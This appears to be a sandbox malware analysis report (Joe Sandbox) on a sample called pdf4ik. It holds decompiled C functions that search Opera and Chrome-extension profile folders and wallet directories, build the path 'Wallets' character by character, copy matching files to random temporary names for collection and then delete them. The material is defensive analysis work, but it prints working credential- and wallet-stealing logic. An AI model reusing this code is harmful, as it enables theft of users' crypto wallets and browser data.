                                        0x29d9e667
                                        0x29d9e69c
                                        0x29d9e6a5
                                        0x29d9e6ae
                                        0x29d9e6da
                                        0x29d9e6da
                                        0x29d9e6ae
                                        0x29d9e6ed
                                        0x29d9e703
                                        0x29d9e719
                                        0x29d9e72f
                                        0x29d9e745
                                        0x29d9e75b
                                        0x29d9e760
                                        0x29d9e766
                                        0x29d9e766
                                        0x29d9e50e
                                        0x29d9e777
                                        0x29d9e794
                                        0x29d9e794
                                        0x29d9e4d9

                                        APIs
                                        • wsprintfA.USER32 ref: 29D9E4A9
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D9E4C8
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9E4EC
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9E506
                                        • _memset.LIBCMT ref: 29D9E522
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E538
                                        • wsprintfA.USER32 ref: 29D9E55A
                                        • wsprintfA.USER32 ref: 29D9E57A
                                        • wsprintfA.USER32 ref: 29D9E59C
                                        • wsprintfA.USER32 ref: 29D9E5BF
                                        • wsprintfA.USER32 ref: 29D9E5E1
                                        • wsprintfA.USER32 ref: 29D9E601
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E617
                                          • Part of subcall function 29D9E060: wsprintfA.USER32 ref: 29D9E0A2
                                          • Part of subcall function 29D9E060: FindFirstFileA.KERNEL32(?,?), ref: 29D9E0B9
                                          • Part of subcall function 29D9E060: StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9E0DF
                                          • Part of subcall function 29D9E060: StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9E0F9
                                          • Part of subcall function 29D9E060: _memset.LIBCMT ref: 29D9E115
                                          • Part of subcall function 29D9E060: _memset.LIBCMT ref: 29D9E12B
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,?), ref: 29D9E13B
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E14D
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,?), ref: 29D9E161
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E173
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,015A1C60), ref: 29D9E19D
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E1AF
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,?), ref: 29D9E1BD
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E1CF
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,?), ref: 29D9E1E3
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E65E
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E6A5
                                        • _memset.LIBCMT ref: 29D9E6ED
                                        • _memset.LIBCMT ref: 29D9E703
                                        • _memset.LIBCMT ref: 29D9E719
                                        • _memset.LIBCMT ref: 29D9E72F
                                        • _memset.LIBCMT ref: 29D9E745
                                        • _memset.LIBCMT ref: 29D9E75B
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 29D9E771
                                        • FindClose.KERNEL32(00000000), ref: 29D9E780
                                        • _memset.LIBCMT ref: 29D9E7A5
                                        • lstrcatA.KERNEL32(?,Opera Stable), ref: 29D9E7DE
                                        • wsprintfA.USER32 ref: 29D9E800
                                        • wsprintfA.USER32 ref: 29D9E820
                                        • wsprintfA.USER32 ref: 29D9E842
                                        • wsprintfA.USER32 ref: 29D9E865
                                        • wsprintfA.USER32 ref: 29D9E887
                                        • wsprintfA.USER32 ref: 29D9E8A7
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E8BD
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E904
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E94B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wsprintf$lstrcat$_memset$File$Attributes$Find$First$CloseNext
                                        • String ID: %s\%s$%s\%s\%s\%s$%s\%s\%s\chrome-extension_%s_0.indexeddb.leveldb$%s\*.*$Opera Crypto Stable$Opera GX Stable$Opera Stable
                                        • API String ID: 2553220182-2904796700
                                        • Opcode ID: b3ad1f996143855ef90d243e69e82440789153c274d3341b3a1748d0e17312a5
                                        • Instruction ID: b7c8658b04b0bf4a96ac9df264ef7c113589309b0ffcd6ce39fe8949c41ffb20
                                        • Opcode Fuzzy Hash: b3ad1f996143855ef90d243e69e82440789153c274d3341b3a1748d0e17312a5
                                        • Instruction Fuzzy Hash: 5AE1A5B2910218ABDB25EB64DD85FDA7378BF48700F40868DF619A3581D734AB89DF70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D96160 Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 219stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E29D96160(intOrPtr* __ebx, CHAR* __ecx, CHAR* __edi, void* __esi, void* _a4) {
				signed int _v12;
				char _v280;
				char _v544;
				char _v808;
				char _v1072;
				void* _v2072;
				struct _WIN32_FIND_DATAA _v2392;
				void* _v2396;
				CHAR* _v2400;
				void* _v2404;
				signed int _t62;
				int _t75;
				signed char _t85;
				intOrPtr* _t113;
				CHAR* _t152;
				void* _t153;
				signed int _t154;
				void* _t155;
				void* _t157;
				void* _t158;

				_t153 = __esi;
				_t152 = __edi;
				_t113 = __ebx;
				_t62 =  *0x29dd5664; // 0xd9555f04
				_v12 = _t62 ^ _t154;
				_v2396 = _a4;
				_v2400 = __ecx;
				E29DB5640( &_v544, 0, 0x104);
				E29DB5640( &_v2072, 0, 0x3e8);
				_t157 = _t155 + 0x18;
				lstrcatA( &_v544,  &_v2072 & (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v2072) < 0x00000000) - 0x00000001);
				if(__esi == 0) {
					_t139 =  &_v1072;
					wsprintfA( &_v1072, "%s\\%s\\%s",  &_v544, _v2396, _v2400);
					_t158 = _t157 + 0x14;
				} else {
					_t139 = _v2396;
					wsprintfA( &_v1072, "%s\\%s\\*",  &_v544, _v2396);
					_t158 = _t157 + 0x10;
				}
				_t75 = FindFirstFileA( &_v1072,  &_v2392);
				_v2404 = _t75;
				if(_t75 == 0xffffffff) {
					L22:
					return E29DADF46(_t75, _t113, _v12 ^ _t154, _t139, _t152, _t153);
				} else {
					do {
						_push(".");
						_push( &(_v2392.cFileName));
						if( *0x29dd8550() != 0) {
							_push("..");
							_push( &(_v2392.cFileName));
							if( *0x29dd8550() != 0) {
								if(_t153 == 0) {
									wsprintfA( &_v808, "%s\\%s\\%s",  &_v544, _v2396,  &(_v2392.cFileName));
									_t158 = _t158 + 0x14;
								} else {
									wsprintfA( &_v808, "%s\\%s\\%s\\%s",  &_v544, _v2396,  &(_v2392.cFileName), _v2400);
									_t158 = _t158 + 0x18;
								}
								_t85 = GetFileAttributesA( &_v808);
								if(_t85 != 0xffffffff && (_t85 & 0x00000010) == 0) {
									E29DB5640( &_v280, 0, 0x104);
									_t158 = _t158 + 0xc;
									lstrcatA( &_v280, "\\");
									lstrcatA( &_v280, "W");
									lstrcatA( &_v280, "a");
									lstrcatA( &_v280, "l");
									lstrcatA( &_v280, "l");
									lstrcatA( &_v280, "e");
									lstrcatA( &_v280, "t");
									lstrcatA( &_v280, "s");
									lstrcatA( &_v280, "\\");
									lstrcatA( &_v280, _t152);
									lstrcatA( &_v280, "\\");
									if(_t153 == 0) {
										lstrcatA( &_v280,  &(_v2392.cFileName));
									} else {
										lstrcatA( &_v280,  &(_v2392.cFileName));
										lstrcatA( &_v280, "\\");
										lstrcatA( &_v280, _v2400);
									}
									if(_t113 != 0) {
										if( *_t113 == 2) {
											 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t113 + 4)),  &_v808,  &_v280, 0, 2);
										} else {
											 *0x29dd8814 = 0x80000;
										}
									} else {
										 *0x29dd8814 = 0x10000;
									}
								}
							}
						}
						_t139 = _v2404;
					} while (FindNextFileA(_v2404,  &_v2392) != 0);
					_t75 = FindClose(_v2404);
					goto L22;
				}
			}























                                        0x29d96160
                                        0x29d96160
                                        0x29d96160
                                        0x29d96169
                                        0x29d96170
                                        0x29d96184
                                        0x29d9618a
                                        0x29d96190
                                        0x29d961a6
                                        0x29d961ab
                                        0x29d961db
                                        0x29d961e3
                                        0x29d9621f
                                        0x29d9622b
                                        0x29d96231
                                        0x29d961e5
                                        0x29d961e5
                                        0x29d961ff
                                        0x29d96205
                                        0x29d96205
                                        0x29d96242
                                        0x29d96248
                                        0x29d96251
                                        0x29d964a1
                                        0x29d964ae
                                        0x29d96257
                                        0x29d96260
                                        0x29d96260
                                        0x29d9626b
                                        0x29d96274
                                        0x29d9627a
                                        0x29d96285
                                        0x29d9628e
                                        0x29d96296
                                        0x29d962ec
                                        0x29d962f2
                                        0x29d96298
                                        0x29d962c0
                                        0x29d962c6
                                        0x29d962c6
                                        0x29d962fc
                                        0x29d96305
                                        0x29d96321
                                        0x29d96326
                                        0x29d96335
                                        0x29d96347
                                        0x29d96359
                                        0x29d9636b
                                        0x29d9637d
                                        0x29d9638f
                                        0x29d963a1
                                        0x29d963b3
                                        0x29d963c5
                                        0x29d963d3
                                        0x29d963e5
                                        0x29d963ed
                                        0x29d96433
                                        0x29d963ef
                                        0x29d963fd
                                        0x29d9640f
                                        0x29d96433
                                        0x29d96433
                                        0x29d9643b
                                        0x29d9644c
                                        0x29d96473
                                        0x29d9644e
                                        0x29d9644e
                                        0x29d9644e
                                        0x29d9643d
                                        0x29d9643d
                                        0x29d9643d
                                        0x29d9643b
                                        0x29d96305
                                        0x29d9628e
                                        0x29d96478
                                        0x29d9648c
                                        0x29d9649b
                                        0x00000000
                                        0x29d9649b

                                        APIs
                                        • _memset.LIBCMT ref: 29D96190
                                        • _memset.LIBCMT ref: 29D961A6
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D961BD
                                        • lstrcatA.KERNEL32(?,?), ref: 29D961DB
                                        • wsprintfA.USER32 ref: 29D961FF
                                        • wsprintfA.USER32 ref: 29D9622B
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D96242
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9626C
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D96286
                                        • wsprintfA.USER32 ref: 29D962C0
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D962FC
                                        • _memset.LIBCMT ref: 29D96321
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D96335
                                        • lstrcatA.KERNEL32(?,29DCFD20), ref: 29D96347
                                        • lstrcatA.KERNEL32(?,29DCFD24), ref: 29D96359
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9636B
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9637D
                                        • lstrcatA.KERNEL32(?,29DCFD2C), ref: 29D9638F
                                        • lstrcatA.KERNEL32(?,29DCFD30), ref: 29D963A1
                                        • lstrcatA.KERNEL32(?,29DCFD34), ref: 29D963B3
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D963C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memsetwsprintf$File$AttributesFindFirstFolderPath
                                        • String ID: %s\%s\%s$%s\%s\%s\%s$%s\%s\*
                                        • API String ID: 664695751-1660153875
                                        • Opcode ID: 76e2d552b5dfab43d21768153b004558ea1030a24f782a3075d117c68fdd8391
                                        • Instruction ID: 8bc4b8c4e258b722eef5dd904d644b2520cb13e6bf3e2c69315b377e51b85eb8
                                        • Opcode Fuzzy Hash: 76e2d552b5dfab43d21768153b004558ea1030a24f782a3075d117c68fdd8391
                                        • Instruction Fuzzy Hash: F18184B6841258ABD715EBA0DC85FDAB378BF58B01F4086DDF205A7044EB349A899F70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9CE80 Relevance: 50.9, APIs: 25, Strings: 4, Instructions: 198stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 71%
                                        			E29D9CE80(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, CHAR* _a16) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v804;
				char _v1068;
				char _v2068;
				struct _WIN32_FIND_DATAA _v2388;
				char* _v2392;
				void* _v2396;
				intOrPtr _v2400;
				intOrPtr _v2404;
				intOrPtr _v2408;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				int _t61;
				int _t72;
				CHAR* _t83;
				signed int _t88;
				intOrPtr* _t94;
				CHAR* _t100;
				intOrPtr _t132;
				void* _t133;
				intOrPtr _t134;
				CHAR* _t135;
				signed int _t136;
				void* _t137;
				void* _t138;
				void* _t139;
				void* _t143;

				_t56 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t56 ^ _t136;
				_t100 = _a16;
				_t134 = _a8;
				_t132 = _a4;
				_v2400 = __ecx;
				_v2404 = _t132;
				_v2408 = _t134;
				_v2392 = _a12;
				wsprintfA( &_v1068, "%s\\*", _t134);
				_t138 = _t137 + 0xc;
				_t119 =  &_v2388;
				_t61 = FindFirstFileA( &_v1068,  &_v2388);
				_v2396 = _t61;
				if(_t61 == 0xffffffff) {
					L18:
					return E29DADF46(_t61, _t100, _v8 ^ _t136, _t119, _t132, _t134);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(".");
					_push( &(_v2388.cFileName));
					if( *0x29dd8550() == 0) {
						goto L16;
					}
					_push("..");
					_push( &(_v2388.cFileName));
					if( *0x29dd8550() == 0) {
						goto L16;
					}
					wsprintfA( &_v804, "%s\\%s", _t134,  &(_v2388.cFileName));
					_t139 = _t138 + 0x10;
					_push(0x29dcd617);
					_push(_t132);
					if( *0x29dd8550() != 0) {
						wsprintfA( &_v540, "%s\\%s", _t132,  &(_v2388.cFileName));
						_t138 = _t139 + 0x10;
					} else {
						wsprintfA( &_v540, "%s",  &(_v2388.cFileName));
						_t138 = _t139 + 0xc;
					}
					_t72 = PathMatchSpecA( &(_v2388.cFileName), _v2392);
					_t148 = _t72;
					if(_t72 == 0) {
						L15:
						E29D9CE80(_v2400,  &_v540,  &_v804, _v2392, _t100);
					} else {
						E29DB5640( &_v2068, 0, 0x3e8);
						lstrcatA( &_v2068, "\\Soft\\");
						lstrcatA( &_v2068, _t100);
						lstrcatA( &_v2068, "\\");
						lstrcatA( &_v2068,  &_v540);
						E29DB5640( &_v276, 0, 0x104);
						_t83 =  *0x29dd8098; // 0x15a1f98
						lstrcatA( &_v276, _t83);
						_t135 = E29DADFE0( &_v276, _t132, _t134, 0x1a);
						 *_t135 = 0;
						E29DAFCE4(GetTickCount());
						_t143 = _t138 + 0x20;
						_t133 = 0x1a;
						do {
							_t88 = E29DAFCF6(_t148);
							asm("cdq");
							_push(_t88 % 0xa);
							_push(_t135);
							wsprintfA(_t135, "%s%d");
							_t143 = _t143 + 0x10;
							_t133 = _t133 - 1;
						} while (_t133 != 0);
						_t135[0x1a] = 0;
						lstrcatA( &_v276, _t135);
						CopyFileA( &_v804,  &_v276, 1);
						_t94 =  *((intOrPtr*)(_v2400 + 0x20));
						if(_t94 != 0) {
							__eflags =  *_t94 - 2;
							if( *_t94 == 2) {
								 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t94 + 4)),  &_v276,  &_v2068, 0, 2);
							} else {
								 *0x29dd8814 = 0x80000;
							}
						} else {
							 *0x29dd8814 = 0x10000;
						}
						DeleteFileA( &_v276);
						_t134 = _v2408;
						_t132 = _v2404;
						goto L15;
					}
					L16:
				} while (FindNextFileA(_v2396,  &_v2388) != 0);
				_t119 = _v2396;
				_t61 = FindClose(_v2396);
				goto L18;
			}


































                                        0x29d9ce89
                                        0x29d9ce90
                                        0x29d9ce97
                                        0x29d9ce9b
                                        0x29d9ce9f
                                        0x29d9cea3
                                        0x29d9ceb5
                                        0x29d9cebb
                                        0x29d9cec1
                                        0x29d9cec7
                                        0x29d9cecd
                                        0x29d9ced0
                                        0x29d9cede
                                        0x29d9cee4
                                        0x29d9ceed
                                        0x29d9d149
                                        0x29d9d159
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9cef3
                                        0x29d9cef3
                                        0x29d9cef3
                                        0x29d9cefe
                                        0x29d9cf07
                                        0x00000000
                                        0x00000000
                                        0x29d9cf0d
                                        0x29d9cf18
                                        0x29d9cf21
                                        0x00000000
                                        0x00000000
                                        0x29d9cf3b
                                        0x29d9cf41
                                        0x29d9cf44
                                        0x29d9cf49
                                        0x29d9cf52
                                        0x29d9cf86
                                        0x29d9cf8c
                                        0x29d9cf54
                                        0x29d9cf67
                                        0x29d9cf6d
                                        0x29d9cf6d
                                        0x29d9cf9d
                                        0x29d9cfa3
                                        0x29d9cfa5
                                        0x29d9d0ff
                                        0x29d9d11b
                                        0x29d9cfab
                                        0x29d9cfb9
                                        0x29d9cfcd
                                        0x29d9cfdb
                                        0x29d9cfed
                                        0x29d9d001
                                        0x29d9d015
                                        0x29d9d01a
                                        0x29d9d02a
                                        0x29d9d037
                                        0x29d9d03c
                                        0x29d9d046
                                        0x29d9d04b
                                        0x29d9d04e
                                        0x29d9d053
                                        0x29d9d053
                                        0x29d9d058
                                        0x29d9d060
                                        0x29d9d061
                                        0x29d9d068
                                        0x29d9d06e
                                        0x29d9d071
                                        0x29d9d071
                                        0x29d9d07c
                                        0x29d9d080
                                        0x29d9d096
                                        0x29d9d0a2
                                        0x29d9d0a7
                                        0x29d9d0b5
                                        0x29d9d0b8
                                        0x29d9d0e1
                                        0x29d9d0ba
                                        0x29d9d0ba
                                        0x29d9d0ba
                                        0x29d9d0a9
                                        0x29d9d0a9
                                        0x29d9d0a9
                                        0x29d9d0ed
                                        0x29d9d0f3
                                        0x29d9d0f9
                                        0x00000000
                                        0x29d9d0f9
                                        0x29d9d120
                                        0x29d9d134
                                        0x29d9d13c
                                        0x29d9d143
                                        0x00000000

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$wsprintf$File$Find$_memset$CloseCopyCountDeleteFirstMatchNextPathSpecTick_malloc_rand
                                        • String ID: %s%d$%s\%s$%s\*$\Soft\
                                        • API String ID: 208320889-1080583690
                                        • Opcode ID: 8aa62d7419f85f2ef00388ba70dab843872a4596bbd3c79a27633fe32355b395
                                        • Instruction ID: cde010c1c8b784959c69c70cba0b9be55cea87d0679fcb4305c4a41c014e1b70
                                        • Opcode Fuzzy Hash: 8aa62d7419f85f2ef00388ba70dab843872a4596bbd3c79a27633fe32355b395
                                        • Instruction Fuzzy Hash: CF7182B2901218ABD715EFA4DC84FEAB378BF48700F04859DF509A3141EB74AA85DFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D964B0 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 189stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 70%
                                        			E29D964B0(CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v804;
				char _v1068;
				void* _v2068;
				struct _WIN32_FIND_DATAA _v2388;
				intOrPtr _v2392;
				intOrPtr _v2396;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				void* _t97;
				intOrPtr* _t126;
				CHAR* _t127;
				signed int _t128;
				void* _t129;
				void* _t131;

				_t53 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t53 ^ _t128;
				_t127 = _a4;
				_t126 = _a16;
				_v2396 = _a8;
				_v2392 = _a12;
				E29DB5640( &_v2068, 0, 0x3e8);
				_t13 = (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v2068) < 0x00000000) - 1; // -1
				wsprintfA( &_v804, "%s\\%s\\*", _t13 &  &_v2068, _t127);
				_t131 = _t129 + 0x1c;
				_t117 =  &_v804;
				_t97 = FindFirstFileA( &_v804,  &_v2388);
				if(_t97 == 0xffffffff) {
					L12:
					return E29DADF46(_t63, _t97, _v8 ^ _t128, _t117, _t126, _t127);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(".");
					_push( &(_v2388.cFileName));
					if( *0x29dd8550() != 0) {
						_push("..");
						_push( &(_v2388.cFileName));
						if( *0x29dd8550() != 0) {
							wsprintfA( &_v540, "%s\\%s", _t127,  &(_v2388.cFileName));
							E29DB5640( &_v2068, 0, 0x3e8);
							_t26 = (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v2068) < 0x00000000) - 1; // -1
							wsprintfA( &_v1068, "%s\\%s", _t26 &  &_v2068,  &_v540);
							E29DB5640( &_v276, 0, 0x104);
							_t131 = _t131 + 0x38;
							lstrcatA( &_v276, "\\");
							lstrcatA( &_v276, "W");
							lstrcatA( &_v276, "a");
							lstrcatA( &_v276, "l");
							lstrcatA( &_v276, "l");
							lstrcatA( &_v276, "e");
							lstrcatA( &_v276, "t");
							lstrcatA( &_v276, "s");
							lstrcatA( &_v276, _t127);
							lstrcatA( &_v276, "\\");
							_t117 =  &(_v2388.cFileName);
							lstrcatA( &_v276,  &(_v2388.cFileName));
							if(_t126 != 0) {
								if( *_t126 == 2) {
									_t117 =  &_v1068;
									 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t126 + 4)),  &_v1068,  &_v276, 0, 2);
								} else {
									 *0x29dd8814 = 0x80000;
								}
							} else {
								 *0x29dd8814 = 0x10000;
							}
							if((_v2388.dwFileAttributes & 0x00000010) != 0) {
								_t117 =  &_v540;
								E29D964B0( &_v540, _v2396, _v2392, _t126);
								_t131 = _t131 + 0x10;
							}
						}
					}
				} while (FindNextFileA(_t97,  &_v2388) != 0);
				_t63 = FindClose(_t97);
				goto L12;
			}






















                                        0x29d964b9
                                        0x29d964c0
                                        0x29d964cb
                                        0x29d964cf
                                        0x29d964e0
                                        0x29d964e6
                                        0x29d964ec
                                        0x29d96517
                                        0x29d96529
                                        0x29d9652f
                                        0x29d96539
                                        0x29d96546
                                        0x29d9654b
                                        0x29d96753
                                        0x29d96763
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d96551
                                        0x29d96551
                                        0x29d96551
                                        0x29d9655c
                                        0x29d96565
                                        0x29d9656b
                                        0x29d96576
                                        0x29d9657f
                                        0x29d96599
                                        0x29d965ad
                                        0x29d965d7
                                        0x29d965f0
                                        0x29d96604
                                        0x29d96609
                                        0x29d96618
                                        0x29d9662a
                                        0x29d9663c
                                        0x29d9664e
                                        0x29d96660
                                        0x29d96672
                                        0x29d96684
                                        0x29d96696
                                        0x29d966a4
                                        0x29d966b6
                                        0x29d966bc
                                        0x29d966ca
                                        0x29d966d2
                                        0x29d966e3
                                        0x29d966ff
                                        0x29d9670a
                                        0x29d966e5
                                        0x29d966e5
                                        0x29d966e5
                                        0x29d966d4
                                        0x29d966d4
                                        0x29d966d4
                                        0x29d96716
                                        0x29d96727
                                        0x29d9672e
                                        0x29d96733
                                        0x29d96733
                                        0x29d96716
                                        0x29d9657f
                                        0x29d96744
                                        0x29d9674d
                                        0x00000000

                                        APIs
                                        • _memset.LIBCMT ref: 29D964EC
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D96503
                                        • wsprintfA.USER32 ref: 29D96529
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D96540
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9655D
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D96577
                                        • wsprintfA.USER32 ref: 29D96599
                                        • _memset.LIBCMT ref: 29D965AD
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D965C4
                                        • wsprintfA.USER32 ref: 29D965F0
                                        • _memset.LIBCMT ref: 29D96604
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D96618
                                        • lstrcatA.KERNEL32(?,29DCFD20), ref: 29D9662A
                                        • lstrcatA.KERNEL32(?,29DCFD24), ref: 29D9663C
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9664E
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D96660
                                        • lstrcatA.KERNEL32(?,29DCFD2C), ref: 29D96672
                                        • lstrcatA.KERNEL32(?,29DCFD30), ref: 29D96684
                                        • lstrcatA.KERNEL32(?,29DCFD34), ref: 29D96696
                                        • lstrcatA.KERNEL32(?,?), ref: 29D966A4
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D966B6
                                        • lstrcatA.KERNEL32(?,?), ref: 29D966CA
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 29D9673E
                                        • FindClose.KERNEL32(00000000), ref: 29D9674D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find_memsetwsprintf$FileFolderPath$CloseFirstNext
                                        • String ID: %s\%s$%s\%s\*
                                        • API String ID: 2665448725-2081284286
                                        • Opcode ID: b2844eaaa69114fd9784fdccdebf148f088adc9dbc806829c47ec8182936a86f
                                        • Instruction ID: 122b76efaf2514d7c7702bb5cd22f12e8885b49d9e820273c386ab5352398378
                                        • Opcode Fuzzy Hash: b2844eaaa69114fd9784fdccdebf148f088adc9dbc806829c47ec8182936a86f
                                        • Instruction Fuzzy Hash: 9871B773940258ABD716EFA0DC89FE9B37CBF58701F44899CF205D6440EB749A899F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8F3E0 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 165filestringmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 63%
                                        			E29D8F3E0(void* __ebx, intOrPtr _a4, intOrPtr _a24) {
				long _v8;
				char _v16;
				signed int _v24;
				char _v288;
				char _v552;
				char _v816;
				char _v1080;
				struct _WIN32_FIND_DATAA _v1400;
				void* _v1404;
				void* _v1408;
				void* __edi;
				void* __esi;
				signed int _t38;
				signed int _t39;
				CHAR* _t52;
				void* _t54;
				CHAR* _t58;
				signed int _t63;
				void* _t72;
				intOrPtr* _t81;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t99;
				void* _t100;
				CHAR* _t101;
				CHAR* _t102;
				signed int _t103;
				void* _t104;
				void* _t106;
				void* _t110;

				_t72 = __ebx;
				_push(0xffffffff);
				_push(E29DC34D8);
				_push( *[fs:0x0]);
				_t38 =  *0x29dd5664; // 0xd9555f04
				_t39 = _t38 ^ _t103;
				_v24 = _t39;
				_push(_t95);
				_push(_t39);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				_v1404 = HeapAlloc(GetProcessHeap(), 0, 0x98967f);
				wsprintfA( &_v816, "%s\\*", __ebx);
				_t106 = _t104 - 0x574 + 0xc;
				_t88 =  &_v816;
				_t99 = FindFirstFileA( &_v816,  &_v1400);
				_v1408 = _t99;
				if(_t99 == 0xffffffff) {
					L12:
					if(_a24 >= 0x10) {
						_push(_a4);
						_t45 = E29DADF3B();
					}
					 *[fs:0x0] = _v16;
					_pop(_t96);
					_pop(_t100);
					return E29DADF46(_t45, _t72, _v24 ^ _t103, _t88, _t96, _t100);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(".");
					_push( &(_v1400.cFileName));
					if( *0x29dd8550() == 0) {
						goto L6;
					}
					_t54 =  *0x29dd8550( &(_v1400.cFileName), "..");
					_t113 = _t54;
					if(_t54 != 0) {
						wsprintfA( &_v1080, "%s\\%s", _t72,  &(_v1400.cFileName));
						E29DB5640( &_v288, 0, 0x104);
						_t58 =  *0x29dd8098; // 0x15a1f98
						lstrcatA( &_v288, _t58);
						_t101 = E29DADFE0( &_v288, _t95, _t99, 0x1a);
						 *_t101 = 0;
						E29DAFCE4(GetTickCount());
						_t110 = _t106 + 0x24;
						_t97 = 0x1a;
						do {
							_t63 = E29DAFCF6(_t113);
							asm("cdq");
							_push(_t63 % 0xa);
							_push(_t101);
							wsprintfA(_t101, "%s%d");
							_t110 = _t110 + 0x10;
							_t97 = _t97 - 1;
						} while (_t97 != 0);
						_t101[0x1a] = 0;
						lstrcatA( &_v288, _t101);
						CopyFileA( &_v1080,  &_v288, 1);
						L29D8EF40( &_v288, _v1404);
						_t106 = _t110 + 4;
						DeleteFileA( &_v288);
						_t99 = _v1408;
					}
					L6:
				} while (FindNextFileA(_t99,  &_v1400) != 0);
				FindClose(_t99);
				_t88 =  &_v552;
				E29DB5640( &_v552, 0, 0x104);
				_t52 =  *0x29dd828c; // 0x15a4228
				_t106 = _t106 + 0xc;
				lstrcatA( &_v552, _t52);
				_t102 = _v1404;
				_t45 = lstrlenA(_t102);
